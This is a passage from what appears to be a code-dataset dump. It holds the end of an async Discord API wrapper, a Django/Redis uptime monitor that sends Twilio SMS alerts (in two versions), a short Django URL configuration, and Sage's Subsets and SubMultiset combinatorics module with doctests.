user_id: str) -> dict: return await super().guild_member_get(guild_id, user_id) async def guild_members_list(self, guild_id: str, limit: int = None, after: str = None) -> typing.List[dict]: return await super().guild_members_list(guild_id, limit, after) async def guild_member_iter(self, guild_id: str, step_size: int = 1000) -> typing.Generator[dict, None, None]: return await super().guild_member_iter(guild_id, step_size) async def guild_member_add(self, guild_id: str, user_id: str, access_token: str, nick: str = None, roles: list = None, mute: bool = None, deaf: bool = None) -> dict: return await super().guild_member_add(guild_id, user_id, access_token, nick, roles, mute, deaf) async def guild_member_modify_nick(self, guild_id: str, user_id: str, nick_to_set: str) -> bool: return await super().guild_member_modify_nick(guild_id, user_id, nick_to_set) async def guild_member_modify_roles(self, guild_id: str, user_id: str, roles: list) -> bool: return await super().guild_member_modify_roles(guild_id, user_id, roles) async def guild_member_modify_mute(self, guild_id: str, user_id: str, mute_bool: bool) -> bool: return await super().guild_member_modify_mute(guild_id, user_id, mute_bool) async def guild_member_modify_deaf(self, guild_id: str, user_id: str, deaf_bool: bool) -> bool: return await super().guild_member_modify_deaf(guild_id, user_id, deaf_bool) async def guild_member_modify_move(self, guild_id: str, user_id: str, channel_move_to: int) -> bool: return await super().guild_member_modify_move(guild_id, user_id, channel_move_to) async def guild_member_me_nick_set(self, guild_id: str, nick_to_set: str) -> dict: return await super().guild_member_me_nick_set(guild_id, nick_to_set) async def guild_member_role_add(self, guild_id: str, user_id: str, role_id: str) -> bool: return await super().guild_member_role_add(guild_id, user_id, role_id) async def guild_member_role_remove(self, guild_id: str, user_id: str, role_id: str) -> bool: return await 
super().guild_member_role_remove(guild_id, user_id, role_id) async def guild_member_remove(self, guild_id: str, user_id: str) -> bool: return await super().guild_member_remove(guild_id, user_id) async def guild_ban_list(self, guild_id: str) -> dict: return await super().guild_ban_list(guild_id) async def guild_ban_create(self, guild_id: str, user_id: str, delete_messages_days=None) -> bool: return await super().guild_ban_create(guild_id, user_id, delete_messages_days) async def guild_ban_remove(self, guild_id: str, user_id: str) -> bool: return await super().guild_ban_remove(guild_id, user_id) async def guild_role_list(self, guild_id: str) -> dict: return await super().guild_role_list(guild_id) async def guild_role_create(self, guild_id: str, permissions: int = None, color: int = None, hoist: bool = None, mentionable: bool = None) -> dict: return await super().guild_role_create(guild_id, permissions, color, hoist, mentionable) async def guild_role_position_modify(self, guild_id: str, list_of_role_positions: list) -> dict: return await super().guild_role_position_modify(guild_id, list_of_role_positions) async def _guild_role_modify(self, guild_id: str, role_id: str, params: dict) -> dict: return await super()._guild_role_modify(guild_id, role_id, params) async def guild_role_modify_name(self, guild_id: str, role_id: str, name: str) -> dict: return await super().guild_role_modify_name(guild_id, role_id, name) async def guild_role_modify_permissions(self, guild_id: str, role_id: str, permissions: int) -> dict: return await super().guild_role_modify_permissions(guild_id, role_id, permissions) async def guild_role_modify_color(self, guild_id: str, role_id: str, color: int) -> dict: return await super().guild_role_modify_color(guild_id, role_id, color) async def guild_role_modify_hoist(self, guild_id: str, role_id: str, hoist: bool) -> dict: return await super().guild_role_modify_hoist(guild_id, role_id, hoist) async def guild_role_modify_mentionable(self, guild_id: str, 
role_id: str, mentionable: bool) -> dict: return await super().guild_role_modify_mentionable(guild_id, role_id, mentionable) async def guild_role_delete(self, guild_id: str, role_id: str) -> dict: return await super().guild_role_delete(guild_id, role_id) async def guild_prune_get_count(self, guild_id: str, days: int) -> dict: return await super().guild_prune_get_count(guild_id, days) async def guild_prune_begin(self, guild_id: str, days: int) -> dict: return await super().guild_prune_begin(guild_id, days) async def guild_voice_region_list(self, guild_id: str) -> dict: return await super().guild_voice_region_list(guild_id) async def guild_invite_list(self, guild_id: str) -> dict: return await super().guild_invite_list(guild_id) async def guild_integration_list(self, guild_id: str) -> dict: return await super().guild_integration_list(guild_id) async def guild_integration_create(self, guild_id: str, integration_type: str, integration_id: str) -> dict: return await super().guild_integration_create(guild_id, integration_type, integration_id) async def guild_integration_modify(self, guild_id: str, integration_id: str, expire_behavior: int, expire_grace_period: int, enable_emoticons: int) -> dict: return await super().guild_integration_modify(guild_id, integration_id, expire_behavior, expire_grace_period, enable_emoticons) async def guild_integration_delete(self, guild_id: str, integration_id: str) -> dict: return await super().guild_integration_delete(guild_id, integration_id) async def guild_integration_sync(self, guild_id: str, integration_id: str) -> dict: return await super().guild_integration_sync(guild_id, integration_id) async def guild_embed_get(self, guild_id: str) -> dict: return await super().guild_embed_get(guild_id) async def guild_embed_modify(self, guild_id: str, enabled: bool = None, channel_id: str = None) -> dict: return await super().guild_embed_modify(guild_id, enabled, channel_id) async def guild_emoji_list(self, guild_id: str) -> dict: return await 
super().guild_emoji_list(guild_id) async def guild_emoji_get(self, guild_id: str, emoji_id: str) -> dict: return await super().guild_emoji_get(guild_id, emoji_id) async def guild_emoji_create(self, guild_id: str, emoji_name: str, image: str, roles: tuple = ()) -> dict: return await super().guild_emoji_create(guild_id, emoji_name, image, roles) async def guild_emoji_modify(self, guild_id: str, emoji_id: str, emoji_name: str, roles: tuple = ()) -> dict: return await super().guild_emoji_modify(guild_id, emoji_id, emoji_name, roles) async def guild_emoji_delete(self, guild_id: str, emoji_id: str) -> dict: return await super().guild_emoji_delete(guild_id, emoji_id) async def channel_get(self, channel_id: str) -> dict: return await super().channel_get(channel_id) async def channel_modify_name(self, channel_id: str, name: str) -> dict: return await super().channel_modify_name(channel_id, name) async def channel_modify_position(self, channel_id: str, position: int) -> dict: return await super().channel_modify_position(channel_id, position) async def channel_modify_topic(self, channel_id: str, topic: str) -> dict: return await super().channel_modify_topic(channel_id, topic) async def channel_modify_bitrate(self, channel_id: str, bitrate: int) -> dict: return await super().channel_modify_bitrate(channel_id, bitrate) async def channel_modify_user_limit(self, channel_id: str, userlimit: int) -> dict: return await super().channel_modify_user_limit(channel_id, userlimit) async def channel_modify_permission_overwrites(self, channel_id: str, overwrite_array: list) -> dict: return await super().channel_modify_permission_overwrites(channel_id, overwrite_array) async def channel_modify_parent_id(self, channel_id: str, parent_id: str): return await super().channel_modify_parent_id(channel_id, parent_id) async def channel_delete(self, channel_id: str) -> dict: return await super().channel_delete(channel_id) async def channel_message_list(self, channel_id: str, limit: int = None, 
around: int = None, before: str = None, after: str = None) -> typing.List[dict]: return await super().channel_message_list(channel_id, limit, around, before, after) async def channel_message_iter(self, channel_id: str, step_size: int = 100) -> typing.AsyncGenerator[dict, None]: return await super().channel_message_iter(channel_id, step_size) async def channel_message_get(self, channel_id: str, message_id: str) -> dict: return await super().channel_message_get(channel_id, message_id) async def channel_message_create(self, channel_id: str, content: str, nonce: bool = None, tts: bool = None, embed: dict = None, files_tuples: typing.Tuple[str, bytes] = None) -> dict: return await super().channel_message_create(channel_id, content, nonce, tts, embed, files_tuples) async def channel_message_reaction_create(self, channel_id: str, message_id: str, emoji: str) -> bool: return await super().channel_message_reaction_create(channel_id, message_id, emoji) async def channel_message_reaction_my_delete(self, channel_id: str, message_id: str, emoji: int) -> bool: return await super().channel_message_reaction_my_delete(channel_id, message_id, emoji) async def channel_message_reaction_delete(self, channel_id: str, message_id: str, user_id: str, emoji: int) -> bool: return await super().channel_message_reaction_delete(channel_id, message_id, user_id, emoji) async def channel_message_reaction_list_users(self, channel_id: str, message_id: str, emoji: str, before: str = None, after: str = None, limit: int = None) -> \ typing.List[dict]: return await super().channel_message_reaction_list_users(channel_id, message_id, emoji, before, after, limit) async def channel_message_reaction_iter_users(self, channel_id: str, message_id: str, emoji: str, step_size: int = 100) -> typing.AsyncGenerator[dict, None]: return await super().channel_message_reaction_iter_users(channel_id, message_id, emoji, step_size) async def channel_message_reaction_delete_all(self, channel_id: str, message_id: str) -> 
bool: return await super().channel_message_reaction_delete_all(channel_id, message_id) async def channel_message_edit(self, channel_id: str, message_id: str, content: str = None, embed: dict = None) -> dict: return await super().channel_message_edit(channel_id, message_id, content, embed) async def channel_message_delete(self, channel_id: str, message_id: str) -> bool: return await super().channel_message_delete(channel_id, message_id) async def channel_message_bulk_delete(self, channel_id: str, messages_array: list) -> bool: return await super().channel_message_bulk_delete(channel_id, messages_array) async def channel_permissions_overwrite_edit(self, channel_id: str, overwrite_id: str, allow_permissions: int, deny_permissions: int, type_of_permissions: str) -> bool: return await super().channel_permissions_overwrite_edit(channel_id, overwrite_id, allow_permissions, deny_permissions, type_of_permissions) async def channel_permissions_overwrite_delete(self, channel_id: str, overwrite_id: str) -> bool: return await super().channel_permissions_overwrite_delete(channel_id, overwrite_id) async def channel_invite_list(self, channel_id: str) -> dict: return await super().channel_invite_list(channel_id) async def channel_invite_create(self, channel_id: str, max_age: int = None, max_uses: int = None, temporary_invite: bool = None, unique: bool = None) -> dict: return await super().channel_invite_create(channel_id, max_age, max_uses, temporary_invite, unique) async def channel_typing_start(self, channel_id: str) -> bool: return await super().channel_typing_start(channel_id) async def channel_pins_get(self, channel_id: str) -> dict: return await super().channel_pins_get(channel_id) async def channel_pins_add(self, channel_id: str, message_id: str) -> dict: return await super().channel_pins_add(channel_id, message_id) async def channel_pins_delete(self, channel_id: str, message_id: str) -> bool: return await super().channel_pins_delete(channel_id, message_id) async def 
invite_get(self, invite_code: str) -> dict: return await super().invite_get(invite_code) async def invite_delete(self, invite_code: str) -> dict: return await super().invite_delete(invite_code) async def invite_accept(self, invite_code: str) -> dict: return await super().invite_accept(invite_code) async def webhook_create(self, channel_id: str, name: str, avatar: bytes = None) -> dict: return await super().webhook_create(channel_id, name, avatar) async def webhook_get_channel(self, channel_id: str) -> dict: return await super().webhook_get_channel(channel_id) async def webhook_guild_get(self, guild_id: str) -> dict: return await super().webhook_guild_get(guild_id) async def webhook_get(self, webhook_id: str) -> dict: return await super().webhook_get(webhook_id) async def webhook_token_get(self, webhook_id: str, webhook_token: int) -> dict: return await super().webhook_token_get(webhook_id, webhook_token) async def webhook_modify(self, webhook_id: str, name: str = None, avatar: bytes = None, channel_id: str = None) -> dict: return await super().webhook_modify(webhook_id, name, avatar, channel_id) async def webhook_token_modify(self, webhook_id: str, webhook_token: int, name: str = None, avatar: bytes = None, channel_id: str = None) -> dict: return await super().webhook_token_modify(webhook_id, webhook_token, name, avatar, channel_id) async def webhook_delete(self, webhook_id: str) -> dict: return await super().webhook_delete(webhook_id) async def webhook_token_delete(self, webhook_id: str, webhook_token: int) -> dict: return await super().webhook_token_delete(webhook_id, webhook_token) async def webhook_execute(self, webhook_id: str, webhook_token: int, content: str, username: str = None, avatar_url: str = None, tts: bool = None, wait_response: bool = None) -> dict: return await super().webhook_execute(webhook_id, webhook_token, content, username, avatar_url, tts, wait_response) async def voice_region_list(self) -> dict: return await super().voice_region_list() 
async def audit_log_get(self, guild_id: str, filter_user_id: str = None, filter_action_type: int = None, before: str = None, limit: int = None) -> typing.Tuple[dict, dict, dict]: return await super().audit_log_get(guild_id, filter_user_id, filter_action_type, before, limit) async def audit_log_iter(self, guild_id: str, filter_user_id: str = None, filter_action_type: int = None, step_size: int = 100) -> typing.AsyncGenerator[typing.Tuple[dict, dict, dict], None]: return await super().audit_log_iter(guild_id, filter_user_id, filter_action_type, step_size) async def gateway_bot_get(self) -> dict: return await super().gateway_bot_get()
2.58919
3
monitor/myapp/server.py
medamines1/monitor
6
6627890
import redis
from myapp.models import open_instances as o
from myapp.models import delay_track as t
import uuid,time,requests
from django.conf import settings  # TODO: change loc to header on production
from twilio.rest import Client


def send_msg(host):
    """Send an SMS alert (via Twilio) saying the instance at ``host`` stopped."""
    account = settings.TWILIO_ACCOUNT
    # NOTE(review): the settings key really is spelled TWILIO_TOEKN in this
    # project's settings module -- keep the misspelled name so existing
    # deployments keep working; rename in settings and here together.
    token = settings.TWILIO_TOEKN
    client = Client(account, token)
    # NOTE(review): "has stoped" typo is kept byte-identical on purpose
    # (user-visible message; change it as a coordinated wording update).
    client.messages.create(to=settings.TO, from_=settings.FROM,
                           body="[Urgent] the instance at %s has stoped ... " % (host))


def setHost(argv):  # TODO: improve this before deploy
    """Extract the host:port that follows a ``runserver`` CLI argument.

    Falls back to "127.0.0.1:8000" when no explicit host:port was given.
    """
    host = "127.0.0.1:8000"
    for k, i in enumerate(argv):
        if i == "runserver":
            try:
                n = argv[k + 1]
                print(n)
                if ":" in n:
                    host = n
                    break
            except Exception:
                # no (or unusable) argument after "runserver" -- keep default
                break
    return host


def update_db():
    """Poll every registered instance once and record its status/latency.

    Reachable instances are marked 'active' and a delay_track row stores the
    response time; unreachable ones are marked 'close' and a one-shot SMS
    alert is sent on the active -> close transition only.
    """
    for i in o.objects.all():
        host = i._adress  # model field is spelled '_adress' -- do not "fix" here
        try:
            resp = requests.get('http://' + host)
            i._status = 'active'
            try:
                new = t(adress=i, _timing=resp.elapsed.total_seconds())
                new.save()
            except Exception:
                # could not record the timing sample; skip saving this instance
                if i._status == 'active':
                    continue
            i.save()
        except Exception as e:
            if i._status == 'close':
                continue  # already known to be down; do not alert again
            i._status = 'close'
            i.save()
            try:
                send_msg(host)
            except Exception:
                pass  # best effort: a failed SMS must not stop the poll loop
            print("alert server with id %s stopped . . . because %s" % (i._adress, e))


def _run_server(m_host='', host='localhost', port=6379, db=0, *arg, **kwargs):
    """Publish the monitor host in redis, then poll instances forever.

    ``host``/``port``/``db`` select the redis server; ``m_host`` is stored
    under the '_server_host' key for clients to discover the monitor.
    """
    r = redis.Redis(host, port, db)
    r.set('_server_host', m_host)
    while True:
        # assumes REQUEST_TIME_OUT is the poll interval in seconds -- confirm
        print(settings.REQUEST_TIME_OUT)
        time.sleep(settings.REQUEST_TIME_OUT)
        update_db()
import redis from myapp.models import open_instances as o from myapp.models import delay_track as t import uuid,time,requests from django.conf import settings #change loc to header on production from twilio.rest import Client def send_msg(host): account = settings.TWILIO_ACCOUNT token = settings.TWILIO_TOEKN client = Client(account, token) message = client.messages.create(to=settings.TO, from_=settings.FROM, body="[Urgent] the instance at %s has stoped ... "%(host)) def setHost(argv):#imporove this before deploy host="127.0.0.1:8000" for k,i in enumerate(argv): if i == "runserver": try: n=argv[k+1] print n if ":" in n: host=n; break except: break return host def update_db(): for i in o.objects.all(): host = i._adress try: resp=requests.get('http://'+host) i._status='active' try: new= t(adress=i,_timing=resp.elapsed.total_seconds()) new.save() except Exception as e: if i._status == 'active': continue i.save() except Exception as e: if i._status == 'close': continue i._status='close' i.save() try: send_msg(host) except: pass print "alert server with id %s stopped . . . because %s"%(i._adress,e) def _run_server(m_host='',host='localhost',port=6379,db=0,*arg,**kwargs): signed= [] r = redis.Redis(host, port, db) r.set('_server_host',m_host) while True: print settings.REQUEST_TIME_OUT time.sleep(settings.REQUEST_TIME_OUT) update_db()
en
0.701988
#change loc to header on production #imporove this before deploy
1.990355
2
GGProject/workflow/urls.py
VarenTechInternship/greeterguru
0
6627891
"""URL routes for the workflow app."""
from django.urls import path

from . import views

urlpatterns = [
    path('ad/', views.UpdateAD.as_view(), name='updatead'),
    path('authfactor/', views.AuthFactor.as_view(), name='authfactor'),
]
from django.urls import path from . import views urlpatterns = [ path('ad/', views.UpdateAD.as_view(), name = 'updatead'), path('authfactor/', views.AuthFactor.as_view(), name = 'authfactor'), ]
none
1
1.667423
2
src/sage/combinat/subset.py
bopopescu/classic_diff_geom
0
6627892
r""" Subsets The combinatorial class of the subsets of a finite set. The set can be given as a list or a Set or else as an integer `n` which encodes the set `\{1,2,...,n\}`. See :class:`Subsets` for more information and examples. AUTHORS: - <NAME>: initial version - <NAME> (2009/02/06): doc improvements + new methods """ #***************************************************************************** # Copyright (C) 2007 <NAME> <<EMAIL>>, # # Distributed under the terms of the GNU General Public License (GPL) # # This code is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. # # The full text of the GPL is available at: # # http://www.gnu.org/licenses/ #***************************************************************************** from sage.sets.set import Set from sage.rings.arith import binomial from sage.rings.integer import Integer import sage.combinat.subword as subword import sage.combinat.choose_nk as choose_nk import sage.misc.prandom as rnd import __builtin__ import itertools from combinat import CombinatorialClass from sage.sets.set import Set_object_enumerated from sage.categories.finite_enumerated_sets import FiniteEnumeratedSets def Subsets(s, k=None, submultiset=False): """ Returns the combinatorial class of the subsets of the finite set s. The set can be given as a list, Set or any iterable convertible to a set. It can alternatively be given a non-negative integer `n` which encode the set `\{1,2,\dots,n\}` (i.e. the Sage ``range(1,s+1)``). A second optional parameter k can be given. In this case, Subsets returns the combinatorial class of subsets of s of size k. Finally the option ``submultiset`` allows one to deal with sets with repeated elements usually called multisets. 
EXAMPLES:: sage: S = Subsets([1, 2, 3]); S Subsets of {1, 2, 3} sage: S.cardinality() 8 sage: S.first() {} sage: S.last() {1, 2, 3} sage: S.random_element() {2} sage: S.list() [{}, {1}, {2}, {3}, {1, 2}, {1, 3}, {2, 3}, {1, 2, 3}] Here is the same example where the set is given as an integer:: sage: S = Subsets(3) sage: S.list() [{}, {1}, {2}, {3}, {1, 2}, {1, 3}, {2, 3}, {1, 2, 3}] We demonstrate various the effect of the various options:: sage: S = Subsets(3, 2); S Subsets of {1, 2, 3} of size 2 sage: S.list() [{1, 2}, {1, 3}, {2, 3}] sage: S = Subsets([1, 2, 2], submultiset=True); S SubMultiset of [1, 2, 2] sage: S.list() [[], [1], [2], [1, 2], [2, 2], [1, 2, 2]] sage: S = Subsets([1, 2, 2, 3], 3, submultiset=True); S SubMultiset of [1, 2, 2, 3] of size 3 sage: S.list() [[1, 2, 2], [1, 2, 3], [2, 2, 3]] sage: S = Subsets(['a','b','a','b'], 2, submultiset=True); S.list() [['a', 'a'], ['a', 'b'], ['b', 'b']] """ if k is not None: k=Integer(k) if isinstance(s, (int, Integer)): if s < 0: raise ValueError("s must be non-negative") s = Set(range(1,s+1)) # if len(Set(s)) != len(s): # multi = True if k is None: if submultiset: return SubMultiset_s(s) else: return Subsets_s(s) else: if submultiset: return SubMultiset_sk(s, k) else: return Subsets_sk(s, k) class Subsets_s(CombinatorialClass): def __init__(self, s): """ TESTS:: sage: s = Subsets(Set([1])) sage: e = s.first() sage: isinstance(e, s.element_class) True In the following "_test_elements" is temporarily disabled until :class:`sage.sets.set.Set_object_enumerated` objects pass the category tests:: sage: S = Subsets([1,2,3]) sage: TestSuite(S).run(skip=["_test_elements"]) sage: S = sage.sets.set.Set_object_enumerated([1,2]) sage: TestSuite(S).run() # todo: not implemented """ CombinatorialClass.__init__(self, category=FiniteEnumeratedSets()) self.s = Set(s) def __repr__(self): """ TESTS:: sage: repr(Subsets([1,2,3])) 'Subsets of {1, 2, 3}' """ return "Subsets of %s"%self.s def __contains__(self, value): """ TESTS:: 
sage: S = Subsets([1,2,3]) sage: Set([1,2]) in S True sage: Set([1,4]) in S False sage: Set([]) in S True """ value = Set(value) for v in value: if not v in self.s: return False return True def cardinality(self): r""" Returns the number of subsets of the set s. This is given by `2^{|s|}`. EXAMPLES:: sage: Subsets(Set([1,2,3])).cardinality() 8 sage: Subsets([1,2,3,3]).cardinality() 8 sage: Subsets(3).cardinality() 8 """ return Integer(2**len(self.s)) def first(self): """ Returns the first subset of s. Since we aren't restricted to subsets of a certain size, this is always the empty set. EXAMPLES:: sage: Subsets([1,2,3]).first() {} sage: Subsets(3).first() {} """ return Set([]) def last(self): """ Returns the last subset of s. Since we aren't restricted to subsets of a certain size, this is always the set s itself. EXAMPLES:: sage: Subsets([1,2,3]).last() {1, 2, 3} sage: Subsets(3).last() {1, 2, 3} """ return self.s def __iter__(self): """ Iterates through the subsets of s. EXAMPLES:: sage: [sub for sub in Subsets(Set([1,2,3]))] [{}, {1}, {2}, {3}, {1, 2}, {1, 3}, {2, 3}, {1, 2, 3}] sage: [sub for sub in Subsets(3)] [{}, {1}, {2}, {3}, {1, 2}, {1, 3}, {2, 3}, {1, 2, 3}] sage: [sub for sub in Subsets([1,2,3,3])] [{}, {1}, {2}, {3}, {1, 2}, {1, 3}, {2, 3}, {1, 2, 3}] """ lset = __builtin__.list(self.s) #We use the iterator for the subwords of range(len(self.s)) ind_set = lambda index_list: Set([lset[i] for i in index_list]) it = itertools.imap(ind_set, subword.Subwords(range(len(lset)))) for sub in it: yield sub def random_element(self): """ Returns a random element of the class of subsets of s (in other words, a random subset of s). EXAMPLES:: sage: Subsets(3).random_element() {2} sage: Subsets([4,5,6]).random_element() {5} """ lset = __builtin__.list(self.s) n = len(self.s) return Set(filter(lambda x: rnd.randint(0,1), lset)) def rank(self, sub): """ Returns the rank of sub as a subset of s. 
EXAMPLES:: sage: Subsets(3).rank([]) 0 sage: Subsets(3).rank([1,2]) 4 sage: Subsets(3).rank([1,2,3]) 7 sage: Subsets(3).rank([2,3,4]) == None True """ subset = Set(sub) lset = __builtin__.list(self.s) lsubset = __builtin__.list(subset) try: index_list = sorted(map(lambda x: lset.index(x), lsubset)) except ValueError: return None n = len(self.s) r = 0 for i in range(len(index_list)): r += binomial(n,i) return r + choose_nk.rank(index_list,n) def unrank(self, r): """ Returns the subset of s that has rank k. EXAMPLES:: sage: Subsets(3).unrank(0) {} sage: Subsets([2,4,5]).unrank(1) {2} """ lset = __builtin__.list(self.s) n = len(lset) if r >= self.cardinality() or r < 0: return None else: for k in range(n+1): bin = binomial(n,k) if r >= bin: r = r - bin else: return Set([lset[i] for i in choose_nk.from_rank(r, n, k)]) def _an_element_(self): """ Returns an example of subset. EXAMPLES:: sage: Subsets(0)._an_element_() {} sage: Subsets(3)._an_element_() {1, 2} sage: Subsets([2,4,5])._an_element_() {2, 4} """ return self.unrank(self.cardinality() // 2) def _element_constructor_(self, x): """ TESTS:: sage: S3 = Subsets(3); S3([1,2]) {1, 2} sage: S3([0,1,2]) Traceback (most recent call last): ... 
ValueError: [0, 1, 2] not in Subsets of {1, 2, 3} """ return Set(x) element_class = Set_object_enumerated class Subsets_sk(CombinatorialClass): def __init__(self, s, k): """ TESTS:: sage: s = Subsets(Set([1])) sage: e = s.first() sage: isinstance(e, s.element_class) True In the following "_test_elements" is temporarily disabled until :class:`sage.sets.set.Set_object_enumerated` objects pass the category tests:: sage: S = Subsets(3,2) sage: TestSuite(S).run(skip=["_test_elements"]) """ CombinatorialClass.__init__(self, category=FiniteEnumeratedSets()) self.s = Set(s) self.k = k def __repr__(self): """ TESTS:: sage: repr(Subsets(3,2)) 'Subsets of {1, 2, 3} of size 2' """ return "Subsets of %s of size %s"%(self.s, self.k) def __contains__(self, value): """ TESTS: sage: S = Subsets([1,2,3], 2) sage: Set([1,2]) in S True sage: Set([1,4]) in S False sage: Set([]) in S False """ value = Set(value) if len(value) != self.k: return False for v in value: if not v in self.s: return False return True def cardinality(self): """ EXAMPLES:: sage: Subsets(Set([1,2,3]), 2).cardinality() 3 sage: Subsets([1,2,3,3], 2).cardinality() 3 sage: Subsets([1,2,3], 1).cardinality() 3 sage: Subsets([1,2,3], 3).cardinality() 1 sage: Subsets([1,2,3], 0).cardinality() 1 sage: Subsets([1,2,3], 4).cardinality() 0 sage: Subsets(3,2).cardinality() 3 sage: Subsets(3,4).cardinality() 0 """ if self.k not in range(len(self.s)+1): return 0 else: return binomial(len(self.s),self.k) def first(self): """ Returns the first subset of s of size k. EXAMPLES:: sage: Subsets(Set([1,2,3]), 2).first() {1, 2} sage: Subsets([1,2,3,3], 2).first() {1, 2} sage: Subsets(3,2).first() {1, 2} sage: Subsets(3,4).first() """ if self.k not in range(len(self.s)+1): return None else: return Set(__builtin__.list(self.s)[:self.k]) def last(self): """ Returns the last subset of s of size k. 
EXAMPLES:: sage: Subsets(Set([1,2,3]), 2).last() {2, 3} sage: Subsets([1,2,3,3], 2).last() {2, 3} sage: Subsets(3,2).last() {2, 3} sage: Subsets(3,4).last() """ if self.k not in range(len(self.s)+1): return None else: return Set(__builtin__.list(self.s)[-self.k:]) def __iter__(self): """ Iterates through the subsets of s of size k. EXAMPLES:: sage: [sub for sub in Subsets(Set([1,2,3]), 2)] [{1, 2}, {1, 3}, {2, 3}] sage: [sub for sub in Subsets([1,2,3,3], 2)] [{1, 2}, {1, 3}, {2, 3}] sage: [sub for sub in Subsets(3,2)] [{1, 2}, {1, 3}, {2, 3}] """ if self.k not in range(len(self.s)+1): return lset = __builtin__.list(self.s) #We use the iterator for the subwords of range(len(self.s)) ind_set = lambda index_list: Set([lset[i] for i in index_list]) for sub in choose_nk.ChooseNK(len(lset),self.k): yield ind_set(sub) def random_element(self): """ Returns a random element of the class of subsets of s of size k (in other words, a random subset of s of size k). EXAMPLES:: sage: Subsets(3, 2).random_element() {1, 2} sage: Subsets(3,4).random_element() is None True """ lset = __builtin__.list(self.s) n = len(self.s) if self.k not in range(len(self.s)+1): return None else: return Set([lset[i] for i in choose_nk.ChooseNK(n, self.k).random_element()]) def rank(self, sub): """ Returns the rank of sub as a subset of s of size k. EXAMPLES:: sage: Subsets(3,2).rank([1,2]) 0 sage: Subsets([2,3,4],2).rank([3,4]) 2 sage: Subsets([2,3,4],2).rank([2]) sage: Subsets([2,3,4],4).rank([2,3,4,5]) """ subset = Set(sub) lset = __builtin__.list(self.s) lsubset = __builtin__.list(subset) try: index_list = sorted(map(lambda x: lset.index(x), lsubset)) except ValueError: return None n = len(self.s) r = 0 if self.k not in range(len(self.s)+1): return None elif self.k != len(subset): return None else: return choose_nk.rank(index_list,n) def unrank(self, r): """ Returns the subset of s that has rank k. 
EXAMPLES:: sage: Subsets(3,2).unrank(0) {1, 2} sage: Subsets([2,4,5],2).unrank(0) {2, 4} """ lset = __builtin__.list(self.s) n = len(lset) if self.k not in range(len(self.s)+1): return None elif r >= self.cardinality() or r < 0: return None else: return Set([lset[i] for i in choose_nk.from_rank(r, n, self.k)]) def _an_element_(self): """ Returns an example of subset. EXAMPLES:: sage: Subsets(0,0)._an_element_() {} sage: Subsets(3,2)._an_element_() {1, 3} sage: Subsets([2,4,5],2)._an_element_() {2, 5} """ return self.unrank(self.cardinality() // 2) def _element_constructor_(self, x): """ TESTS:: sage: S32 = Subsets(3,2); S32([1,2]) {1, 2} sage: S32([0,1,2]) Traceback (most recent call last): ... ValueError: [0, 1, 2] not in Subsets of {1, 2, 3} of size 2 """ return Set(x) element_class = Set_object_enumerated class SubMultiset_s(CombinatorialClass): """ The combinatorial class of the sub multisets of s. EXAMPLES:: sage: S = Subsets([1,2,2,3], submultiset=True) sage: S._s [1, 2, 2, 3] The positions of the unique elements in s are stored in:: sage: S._indices [0, 1, 3] and their multiplicities in:: sage: S._multiplicities [1, 2, 1] sage: Subsets([1,2,3,3], submultiset=True).cardinality() 12 sage: TestSuite(S).run() """ def __init__(self, s): """ Constructs the combinatorial class of the sub multisets of s. 
EXAMPLES:: sage: S = Subsets([1,2,2,3], submultiset=True) sage: Subsets([1,2,3,3], submultiset=True).cardinality() 12 """ CombinatorialClass.__init__(self, category=FiniteEnumeratedSets()) s = sorted(list(s)) indices = list(sorted(Set([s.index(a) for a in s]))) multiplicities = [len([a for a in s if a == s[i]]) for i in indices] self._s = s self._indices = indices self._multiplicities = multiplicities def __repr__(self): """ TESTS:: sage: S = Subsets([1, 2, 2, 3], submultiset=True); S SubMultiset of [1, 2, 2, 3] """ return "SubMultiset of %s"%self._s def __contains__(self, s): """ TESTS:: sage: S = Subsets([1,2,2,3], submultiset=True) sage: [] in S True sage: [1, 2, 2] in S True sage: all(i in S for i in S) True sage: [1, 2, 2, 2] in S False sage: [1, 3, 2, 2] in S True sage: [4] in S False """ return sorted(s) in subword.Subwords(self._s) def __iter__(self): """ Iterates through the subsets of the multiset ``self._s``. Note that each subset is represented by a list of its elements rather than a set since we can have multiplicities (no multiset data structure yet in sage). EXAMPLES:: sage: S = Subsets([1,2,2,3], submultiset=True) sage: S.list() [[], [1], [2], [3], [1, 2], [1, 3], [2, 2], [2, 3], [1, 2, 2], [1, 2, 3], [2, 2, 3], [1, 2, 2, 3]] """ for k in range(len(self._s)+1): for s in SubMultiset_sk(self._s, k): yield s class SubMultiset_sk(SubMultiset_s): """ The combinatorial class of the subsets of size k of a multiset s. Note that each subset is represented by a list of the elements rather than a set since we can have multiplicities (no multiset data structure yet in sage). 
EXAMPLES:: sage: S = Subsets([1,2,3,3],2, submultiset=True) sage: S._k 2 sage: S.cardinality() 4 sage: S.first() [1, 2] sage: S.last() [3, 3] sage: [sub for sub in S] [[1, 2], [1, 3], [2, 3], [3, 3]] sage: TestSuite(S).run() """ def __init__(self, s, k): """ TEST:: sage: S = Subsets([1,2,3,3],2, submultiset=True) sage: [sub for sub in S] [[1, 2], [1, 3], [2, 3], [3, 3]] """ SubMultiset_s.__init__(self, s) self._k = k def __repr__(self): """ TESTS:: sage: S = Subsets([1, 2, 2, 3], 3, submultiset=True); S SubMultiset of [1, 2, 2, 3] of size 3 """ return "SubMultiset of %s of size %s"%(self._s, self._k) def __contains__(self, s): """ TESTS:: sage: S = Subsets([1,2,2,3], 2, submultiset=True) sage: [] in S False sage: [1, 2, 2] in S False sage: all(i in S for i in S) True sage: [2, 2] in S True sage: [1, 3] in S True sage: [4] in S False sage: [3, 3] in S False """ return sorted(s) in subword.Subwords(self._s, self._k) def __iter__(self): """ Iterates through the subsets of size ``self._k`` of the multiset ``self._s``. Note that each subset is represented by a list of the elements rather than a set since we can have multiplicities (no multiset data structure yet in sage). EXAMPLES:: sage: S = Subsets([1,2,2,3],2, submultiset=True) sage: S.list() [[1, 2], [1, 3], [2, 2], [2, 3]] """ from sage.combinat.integer_vector import IntegerVectors for iv in IntegerVectors(self._k, len(self._indices), outer=self._multiplicities): yield sum([ [self._s[self._indices[i]]]*iv[i] for i in range(len(iv))], [])
